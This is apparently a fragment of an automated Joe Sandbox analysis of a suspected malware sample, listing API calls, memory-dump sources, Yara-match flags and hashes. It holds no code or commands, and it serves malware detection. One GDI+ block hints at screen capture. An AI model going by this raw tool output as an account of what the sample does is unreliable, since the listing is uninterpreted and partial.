                                                                                  • SetLastError.KERNEL32(00000000,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,FE93531E), ref: 00428E81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                  • String ID:
                                                                                  • API String ID: 3852720340-0
                                                                                  • Opcode ID: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                                                  • Instruction ID: 13d4ce3fadb6930e01a7802674f608048713f2fc9b33e2444f23e675ffd4a1be
                                                                                  • Opcode Fuzzy Hash: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                                                  • Instruction Fuzzy Hash: 7301D43230AB316EA6242BF67C8956F2744EB1577ABA1033FF510D12F1EE698C21954E
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,04859058,048569E9,04870927,00000008,04870C8C,?,?,?,?,04853CD2,?,?,0045A064), ref: 0485906F
                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0485907D
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04859096
                                                                                  • SetLastError.KERNEL32(00000000,?,04859058,048569E9,04870927,00000008,04870C8C,?,?,?,?,04853CD2,?,?,0045A064), ref: 048590E8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                  • String ID:
                                                                                  • API String ID: 3852720340-0
                                                                                  • Opcode ID: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                                                  • Instruction ID: fd54cc55adcd6ce401347e6eb75b20b6fa11388bfbec9f8b7cfd8e1ae4c3cb0b
                                                                                  • Opcode Fuzzy Hash: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                                                  • Instruction Fuzzy Hash: 3101FC72209B11AEB7283BB87C899272748EB0567AB200F39ED20C11F1EF9268515595
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00404D88
                                                                                  • int.LIBCPMT ref: 00404D9F
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 00404DA8
                                                                                  • std::_Facet_Register.LIBCPMT ref: 00404DD9
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DEF
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00404E0D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                  • String ID:
                                                                                  • API String ID: 2243866535-0
                                                                                  • Opcode ID: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                                                  • Instruction ID: 4ef84c01712664b50a137fe66981e95a650a2e1b5a714d2619638ac2ebdb4e30
                                                                                  • Opcode Fuzzy Hash: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                                                  • Instruction Fuzzy Hash: 9411A372D001189BCB15EBA5C841AEEB7B4AF54715F14017FE901BB2D2DB3C9A0587DC
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 04834FEF
                                                                                  • int.LIBCPMT ref: 04835006
                                                                                    • Part of subcall function 0483BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 0483BFF9
                                                                                    • Part of subcall function 0483BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 0483C013
                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0483500F
                                                                                  • std::_Facet_Register.LIBCPMT ref: 04835040
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 04835056
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04835074
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                  • String ID:
                                                                                  • API String ID: 2243866535-0
                                                                                  • Opcode ID: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                                                  • Instruction ID: d41f09cc3eb551b60eed3cd8977a9394391745cbf7e8befd490ce15aa882cc3a
                                                                                  • Opcode Fuzzy Hash: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                                                  • Instruction Fuzzy Hash: E811A032900218ABEB25FFA8C810AED7770AF4071AF144E19E911F72D0DBB5BA0487D2
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040C1BF
                                                                                  • int.LIBCPMT ref: 0040C1D6
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0040C1DF
                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040C210
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C226
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C244
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                  • String ID:
                                                                                  • API String ID: 2243866535-0
                                                                                  • Opcode ID: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                                                  • Instruction ID: 1719d9dd00d927231adb6862ad7e4c37149c3208904b64558a42dcf46f1f70c2
                                                                                  • Opcode Fuzzy Hash: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                                                  • Instruction Fuzzy Hash: 2011A072D00228DBCB14EBA4D891AEDB774AF44314F14057EE401BB2D2DF3C9A0587D9
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00405508
                                                                                  • int.LIBCPMT ref: 0040551F
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 00405528
                                                                                  • std::_Facet_Register.LIBCPMT ref: 00405559
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040556F
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040558D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                  • String ID:
                                                                                  • API String ID: 2243866535-0
                                                                                  • Opcode ID: e4ce11b37ce44f7ba8e9afc7401a0a9b198b24000e5175f43f23aaf661957535
                                                                                  • Instruction ID: 335d1a0449174c4850433ac7d89b0c6b75dcf3c5386a47d7b2396d3cdec16656
                                                                                  • Opcode Fuzzy Hash: e4ce11b37ce44f7ba8e9afc7401a0a9b198b24000e5175f43f23aaf661957535
                                                                                  • Instruction Fuzzy Hash: 5B117072D005289BCB15EBA4D841AEEB774EF44319F54013EE415BB2D2DB389E058B9C
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004055A4
                                                                                  • int.LIBCPMT ref: 004055BB
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 004055C4
                                                                                  • std::_Facet_Register.LIBCPMT ref: 004055F5
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040560B
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00405629
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                  • String ID:
                                                                                  • API String ID: 2243866535-0
                                                                                  • Opcode ID: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                                                  • Instruction ID: 8e1419515e35d36fc68c9e18a3e27bb0650dc63e33415fac19ced33b622727b6
                                                                                  • Opcode Fuzzy Hash: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                                                  • Instruction Fuzzy Hash: B911AC729006289BCF14EBA0C841AEEB360EF44319F14043FE811BB2D2DB389A058BDC
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00404C4A
                                                                                  • int.LIBCPMT ref: 00404C61
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                    • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 00404C6A
                                                                                  • std::_Facet_Register.LIBCPMT ref: 00404C9B
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00404CB1
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CCF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                  • String ID:
                                                                                  • API String ID: 2243866535-0
                                                                                  • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                                                  • Instruction ID: 7f60e392e4a430ae1f2c93b626e46d5b6b74a1b844d6ec56694562dd50cc071c
                                                                                  • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                                                  • Instruction Fuzzy Hash: 6811A072D001289BCB14EBA0C841AEEB7B0AF84319F11003EE511BB2E2DB3C990487D8
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0483C426
                                                                                  • int.LIBCPMT ref: 0483C43D
                                                                                    • Part of subcall function 0483BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 0483BFF9
                                                                                    • Part of subcall function 0483BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 0483C013
                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0483C446
                                                                                  • std::_Facet_Register.LIBCPMT ref: 0483C477
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0483C48D
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0483C4AB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                  • String ID:
                                                                                  • API String ID: 2243866535-0
                                                                                  • Opcode ID: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                                                  • Instruction ID: d9fcd411b0fb2e581c79a5aade78b39714f40836363b833ee890de06d5be5f23
                                                                                  • Opcode Fuzzy Hash: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                                                  • Instruction Fuzzy Hash: 2C11C2729002289BDB11FBA8C800AFD7760AF4031AF140E19E911FB2D0DBB4BA04CBD2
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 04834EB1
                                                                                  • int.LIBCPMT ref: 04834EC8
                                                                                    • Part of subcall function 0483BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 0483BFF9
                                                                                    • Part of subcall function 0483BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 0483C013
                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 04834ED1
                                                                                  • std::_Facet_Register.LIBCPMT ref: 04834F02
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 04834F18
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04834F36
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                  • String ID:
                                                                                  • API String ID: 2243866535-0
                                                                                  • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                                                  • Instruction ID: d5d3e0f0fd16fdf1725e894677aee2792e2449838a7b6c8e8d789295982a4cb2
                                                                                  • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                                                  • Instruction Fuzzy Hash: 231182729002189BDB15FB68C844AFD7774AF4071AF140E19E911E72E0DBB4BA44C7D2
                                                                                  APIs
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0485898A
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 04858A43
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                  • String ID: 11@$@fB$csm
                                                                                  • API String ID: 3480331319-1464837749
                                                                                  • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                  • Instruction ID: 23ba419fe2fcf06c50f3d227d06bcd0e1e7e8a1be16c8f2907efab5315dc388c
                                                                                  • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                  • Instruction Fuzzy Hash: 8141D834A00209EBCF11EF28C8809AE7BA5AF45318F148756DC15DB3A1D771BA65CB92
                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,00000000), ref: 00423759
                                                                                  • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423741
                                                                                    • Part of subcall function 0041B74C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B76D
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0042378A
                                                                                  • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004237B3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                  • String ID: 11@
                                                                                  • API String ID: 2630251706-1785270423
                                                                                  • Opcode ID: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                                                  • Instruction ID: 33ce48ef146ac78a3ef221314cc781bfd8a3c25b4f9a6e194e2960aa52b33145
                                                                                  • Opcode Fuzzy Hash: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                                                  • Instruction Fuzzy Hash: 9C110B757002106BCF047F65DC85DAE7765EF84772B10416BFA05D7292CFAC9E41CA98
                                                                                  APIs
                                                                                  • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE41
                                                                                  • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE65
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE78
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE86
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                  • String ID: pScheduler
                                                                                  • API String ID: 3657713681-923244539
                                                                                  • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                                                  • Instruction ID: 46b9ecfe0875f7f86596c353a9bffc422044863c42dab0ab2bac390bf5a45ba1
                                                                                  • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                                                  • Instruction Fuzzy Hash: 8FF0593594070863C324EB15DC828DEB3799E91728360812FE40563182CF3CAE8AC69D

APIs
• Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E65F
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E672
• __CxxThrowException@8.LIBVCRUNTIME ref: 0041E680
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd

APIs
• Concurrency::critical_section::unlock.LIBCMT ref: 00411EBC
  • Part of subcall function 00411132: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411153
  • Part of subcall function 00411132: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041118A
  • Part of subcall function 00411132: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411196
• Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411EC8
  • Part of subcall function 00410AA3: Concurrency::critical_section::unlock.LIBCMT ref: 00410AC7
• Concurrency::Context::Block.LIBCONCRT ref: 00411ECD
  • Part of subcall function 00412C81: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C83
• Concurrency::critical_section::lock.LIBCONCRT ref: 00411EED
  • Part of subcall function 0041105B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411069
  • Part of subcall function 0041105B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411076
  • Part of subcall function 0041105B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411081
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd

APIs
• Concurrency::critical_section::unlock.LIBCMT ref: 04842123
  • Part of subcall function 04841399: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 048413BA
  • Part of subcall function 04841399: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 048413F1
  • Part of subcall function 04841399: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 048413FD
• Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0484212F
  • Part of subcall function 04840D0A: Concurrency::critical_section::unlock.LIBCMT ref: 04840D2E
• Concurrency::Context::Block.LIBCONCRT ref: 04842134
  • Part of subcall function 04842EE8: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 04842EEA
• Concurrency::critical_section::lock.LIBCONCRT ref: 04842154
  • Part of subcall function 048412C2: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 048412D0
  • Part of subcall function 048412C2: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 048412DD
  • Part of subcall function 048412C2: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 048412E8
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd

Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd

Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd

APIs
  • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
• _free.LIBCMT ref: 00430B6F
• _free.LIBCMT ref: 00430B86
• _free.LIBCMT ref: 00430BA5
• _free.LIBCMT ref: 00430BC0
• _free.LIBCMT ref: 00430BD7
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd

Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd

Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd

Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd

APIs
• MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D11A,00000000,00000000,0042D958,?,0042D958,?,00000001,0042D11A,23E85006,00000001,0042D958,0042D958), ref: 0043690A
• __alloca_probe_16.LIBCMT ref: 00436942
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436993
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004369A5
• __freea.LIBCMT ref: 004369AE
  • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd

APIs
• _SpinWait.LIBCONCRT ref: 0041AF0B
  • Part of subcall function 00410F41: _SpinWait.LIBCONCRT ref: 00410F59
• Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AF1F
• Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF51
• List.LIBCMT ref: 0041AFD4
• List.LIBCMT ref: 0041AFE3
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd

APIs
• GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402086
• GdipAlloc.GDIPLUS(00000010), ref: 0040208E
• GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 004020A9
• GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020D3
• GdiplusShutdown.GDIPLUS(?), ref: 004020FF
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd

APIs
• std::_Locinfo::_Locinfo.LIBCPMT ref: 048350C8
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 048350DC
  • Part of subcall function 0483BDD3: __EH_prolog3_GS.LIBCMT ref: 0483BDDA
• std::_Locinfo::_Locinfo.LIBCPMT ref: 04835141
• __Getcoll.LIBCPMT ref: 04835150
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 04835160
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd

APIs
• GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
• _free.LIBCMT ref: 00431FB8
• _free.LIBCMT ref: 00431FDF
• SetLastError.KERNEL32(00000000), ref: 00431FEC
• SetLastError.KERNEL32(00000000), ref: 00431FF5
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free
                                                                                  • String ID:
                                                                                  • API String ID: 3170660625-0
                                                                                  • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                  • Instruction ID: 1e3cd072d0496c43a3242b2b2daca3b64790c0c87830b362050c04c7c8c4abe4
                                                                                  • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                  • Instruction Fuzzy Hash: 2101F936149A007BD61227255C45D6B262DABD977AF20212FF815933E2EFAD8906412D
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(0483DAFC,0483DAFC,00000002,0485ED55,04863971,00000000,?,04856A25,00000002,00000000,00000000,00000000,?,0483CFAD,0483DAFC,00000004), ref: 048621EA
                                                                                  • _free.LIBCMT ref: 0486221F
                                                                                  • _free.LIBCMT ref: 04862246
                                                                                  • SetLastError.KERNEL32(00000000,?,0483DAFC), ref: 04862253
                                                                                  • SetLastError.KERNEL32(00000000,?,0483DAFC), ref: 0486225C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
